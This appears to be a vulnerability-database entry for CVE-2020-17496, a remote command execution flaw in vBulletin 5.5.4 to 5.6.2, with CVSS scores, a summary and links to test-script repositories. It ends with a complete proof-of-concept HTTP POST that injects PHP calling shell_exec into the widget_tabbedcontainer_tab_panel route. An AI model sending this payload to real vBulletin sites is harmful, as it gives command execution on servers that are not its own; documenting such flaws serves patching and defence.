
CVE-2020-17496

Published: 12/08/2020 Updated: 26/10/2022
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 668
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

vBulletin 5.5.4 up to and including 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.

Vulnerable Product

vbulletin vbulletin

Github Repositories

(CVE-2020-17496) vBulletin 5.x Widget_tabbedcontainer_tab_panel RCE Vuln Test script

vBulletin_5x-tab_panel-RCE

[CVE-2020-17496] is a vulnerability in vBulletin’s ajax/render/widget_php route by injecting malicious code via the widgetConfig parameter.

Affected System: vBulletin 5.5.4 ~ 5.6.2

vBulletin 5.x Widget_tabbedcontainer_tab_panel RCE Vuln Test script

Usage> python vBulletin_5x-tab_panel-RCE.py <dst_ip> <dst_port>

CVE-2020-17496

POST /ajax/render/widget_tabbedcontainer_tab_panel?XDEBUG_SESSION_START=phpstorm HTTP/1.1
Host: localhost
User-Agent: curl/7.54.0
Accept: */*
Content-Length: 100
Content-Type: application/x-www-form-urlencoded

subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec("pwd"); exit;

CV